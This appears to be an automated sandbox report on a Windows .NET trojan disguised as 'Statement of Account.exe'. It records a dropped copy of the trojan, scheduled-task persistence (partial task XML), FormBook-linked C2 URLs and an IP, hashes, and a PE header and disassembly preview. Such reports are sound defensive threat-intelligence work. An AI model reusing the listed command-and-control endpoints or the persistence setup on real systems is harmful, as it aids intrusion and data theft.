                                                                                                                                                Classification:mal100.troj.evad.winEXE@535/11@11/1
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                • Number of executed functions: 129
                                                                                                                                                • Number of non-executed functions: 324
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • VT rate limit hit for: Statement of Account.exe

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                10:34:00API Interceptor1x Sleep call for process: Statement of Account.exe modified
                                                                                                                                                10:34:02API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                                                10:34:04API Interceptor1x Sleep call for process: SIZfuXT.exe modified
                                                                                                                                                10:34:28API Interceptor8659033x Sleep call for process: explorer.exe modified
                                                                                                                                                10:34:45API Interceptor7579714x Sleep call for process: NETSTAT.EXE modified
                                                                                                                                                14:34:02Task SchedulerRun new task: SIZfuXT path: C:\Users\user\AppData\Roaming\SIZfuXT.exe

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                85.13.166.18New PO 127429.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.irex.info/cu29/?u6Zt=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgnCDylQV65J9tAeA==&kR-l=xP68RjTX
                                                                                                                                                Payment Reciept FL202306150003 Request 10273 Konturteile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                • www.irex.info/cu29/?lv1DT=Y2Jlpvjp8x-0AHv&iBZlUlWP=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNsnRT+mJF6v
                                                                                                                                                Request For PO-230102.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.irex.info/cu29/?Dzr=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgedySmeDm+J9tHNw==&R2M=Gpg8ENjxBfvTXZ1

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                www.irex.infoNew PO 127429.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                RFQ 242024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                Payment Reciept FL202306150003 Request 10273 Konturteile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                October 2024 PricesOffer Rates.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                Request For PO-230102.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 85.13.166.18

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                NMM-ASD-02742FriedersdorfHauptstrasse68DENew PO 127429.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 85.13.184.4
                                                                                                                                                Payment Reciept FL202306150003 Request 10273 Konturteile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                4ui8luUSNp.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                                                                                                • 85.13.166.174
                                                                                                                                                Request For PO-230102.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 85.13.166.18
                                                                                                                                                https://allegro-worxx.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                • 85.13.161.130
                                                                                                                                                https://atpscan.global.hornetsecurity.com/?d=48cXMF0z7lMlWaR4-PlsbtUc8mFiMfFFndJRjEPuYtN-uYwWsyWxL5J5MR-Ug5CE&f=dme3IKUCx1CkAEFqHg7DwPw18BP_OQlvudnvuL33-Lpo64IRdbltM4_7BbS22Zf4&i=&k=uvEU&m=C-1BZKEYF-Cl5rwq0_FrWo_rnOtg9J2VjL7wG_KiYQ4zCmrhfgeCWZm7jI2FLiWiujyVfZXhjPSaNszUHd_-tPPbHZVMqnN_KxIKzjHidCoVjgDEgxtyWq50QMIznX31&n=msheiBXClL42beZAq-0MKeu_K3YWbf4RbFSWB4nMvrZjKHZvlfgqWpnAMmHJM8nOBGwYdLcEaXDrA0ElMeqJyA&r=qQoQsacw6FZ-pWCR9Ygk8d_uohNhiBjvfkDS9IBTRytjYPkbqiDbNjzjfMkGfqGW&s=c3334c9337ad200a046268dabfc48b0b462d8959b1985605036142fc4b1a8f81&u=https%3A%2F%2Fmqqaqm.clicks.mlsend.com%2Ftb%2Fc%2FeyJ2Ijoie1wiYVwiOjEwNjMxNTQsXCJsXCI6MTMxNjM1NDA2NzI2NzU5NjE3LFwiclwiOjEzMTYzNTQwNjk1MTE1NTExNX0iLCJzIjoiMWU0NDhhM2JiYjBjYmJmOSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                • 85.13.157.247
                                                                                                                                                https://immergut.dotling.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 85.13.165.204
                                                                                                                                                firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 85.13.147.130
                                                                                                                                                firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 85.13.147.130

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SIZfuXT.exe.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Statement of Account.exe.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2232
                                                                                                                                                Entropy (8bit):5.380805901110357
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMtUyus:lGLHxvCZfIfSKRHmOugras
                                                                                                                                                MD5:B69D4BCEB473BE2D80461590F6510392
                                                                                                                                                SHA1:C0F9556CCB243C3778C856E2A87C59EF846E2BDD
                                                                                                                                                SHA-256:8AF0F83277B74D0D2D6239993569D5635618D4900F2F446123E9399D6B6B9F74
                                                                                                                                                SHA-512:96A2D3B4157320EB2E2B53E8BEFE460B0E00E4851B09E07EACBA9B45309361D4C6A9C4E14C6E80CCE79EB0119C0550372FF80479DFA06CE35D819EEACCBD47BA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvo3xegj.5lk.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ls0dbnz3.hod.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofoc4tek.2iu.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oz5k0fm0.43f.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1573
                                                                                                                                                Entropy (8bit):5.111648361188591
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta/Z+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8Qv
                                                                                                                                                MD5:D9267C09B27D61DE216C46C89908DF5F
                                                                                                                                                SHA1:744BC3909EE52F2A2333608ABEA100453B39FAC6
                                                                                                                                                SHA-256:7539F379DAF04EC305A4BD6FE8252DA2F2CAFBB557FA989A1C3F8694AC9B8F2F
                                                                                                                                                SHA-512:F580BB49AB7134759F5398B5D5AF8F963B3CB96855AC04C649DF83083DFA53E1C651100201CD759E2E9FF081CB46B367A1AA49FACF0AA6C2111C0D15F87E6F87
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1573
                                                                                                                                                Entropy (8bit):5.111648361188591
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta/Z+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8Qv
                                                                                                                                                MD5:D9267C09B27D61DE216C46C89908DF5F
                                                                                                                                                SHA1:744BC3909EE52F2A2333608ABEA100453B39FAC6
                                                                                                                                                SHA-256:7539F379DAF04EC305A4BD6FE8252DA2F2CAFBB557FA989A1C3F8694AC9B8F2F
                                                                                                                                                SHA-512:F580BB49AB7134759F5398B5D5AF8F963B3CB96855AC04C649DF83083DFA53E1C651100201CD759E2E9FF081CB46B367A1AA49FACF0AA6C2111C0D15F87E6F87
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                C:\Users\user\AppData\Roaming\SIZfuXT.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):702976
                                                                                                                                                Entropy (8bit):7.784115992955648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DjakOtXy9wBynnEBkRbsrli5VzgnaIwvBPmBaKcWDtQwBPaNi9a:Dj34Lo4kRbs5i3zgnVomBSwqCCi9
                                                                                                                                                MD5:D034873F3CA1528CD660316E6BBE8C14
                                                                                                                                                SHA1:BFD745B38033A3E3EE21BE7876D053EA20CC46EF
                                                                                                                                                SHA-256:0248B7BDBF6C49FFCEDDAE89725A94DA2C3076EBBF6253FAFD2C817B57DC5891
                                                                                                                                                SHA-512:DFE8C17EE1846F7F469BB51ACC42695734E2EEA555D1FBA81BC44A9686C4D9BB1D6F424EA156D2E15E4D8C002A4405F53719481AE875AA36FA9AD04ADF436B65
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.g..............0..t...D........... ........@.. ....................... ............@.................................T...O........A........................................................................... ............... ..H............text....r... ...t.................. ..`.rsrc....A.......B...v..............@..@.reloc..............................@..B........................H.......,G...3..........<z...............................................0..\.........}......}.....(.......(......{..........%.r...p.%.r...p.%.r!..p.(....&..}......}....(.....*&...}....*&...}....*.0............{....,..{....+....,}..(......{....o.........,#.s.......{....o....o%.....o....&.+6.{....o.........,$.s.........{....o....o%......o....&..(......+..r?..p(....&.*....0..+.........,..{.......+....,...{....o........(.....*..0..#..........8.......8........o.....+-....(....o..

                                                                                                                                                C:\Users\user\AppData\Roaming\SIZfuXT.exe:Zone.Identifier

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26
                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.784115992955648
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:Statement of Account.exe
                                                                                                                                                File size:702'976 bytes
                                                                                                                                                MD5:d034873f3ca1528cd660316e6bbe8c14
                                                                                                                                                SHA1:bfd745b38033a3e3ee21be7876d053ea20cc46ef
                                                                                                                                                SHA256:0248b7bdbf6c49ffceddae89725a94da2c3076ebbf6253fafd2c817b57dc5891
                                                                                                                                                SHA512:dfe8c17ee1846f7f469bb51acc42695734e2eea555d1fba81bc44a9686c4d9bb1d6f424ea156d2e15e4d8c002a4405f53719481ae875aa36fa9ad04adf436b65
                                                                                                                                                SSDEEP:12288:DjakOtXy9wBynnEBkRbsrli5VzgnaIwvBPmBaKcWDtQwBPaNi9a:Dj34Lo4kRbs5i3zgnVomBSwqCCi9
                                                                                                                                                TLSH:9EE4016C171AD513CC920BB82EB1F2F82A3C6DDDE902D2525FDD6EFB7466E052E44182
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.g..............0..t...D........... ........@.. ....................... ............@................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:336dce8793686129

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x4a92a6
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x67023AB0 [Sun Oct 6 07:22:24 2024 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
